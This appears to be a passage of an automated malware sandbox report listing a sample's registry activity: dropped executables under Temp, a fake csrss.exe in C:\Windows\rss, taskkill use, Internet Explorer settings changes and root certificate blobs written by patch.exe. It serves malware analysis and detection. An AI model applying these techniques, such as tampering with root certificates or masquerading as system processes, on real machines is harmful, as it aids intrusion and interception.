Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-PST3N.tmp\Wed10fa57e769925f6.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\odbcconf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1015ba90d2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Gparted\Build.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\r3AxJr.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed109189c07b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-C6M02.tmp\Wed101f2195049.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\rss\csrss.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 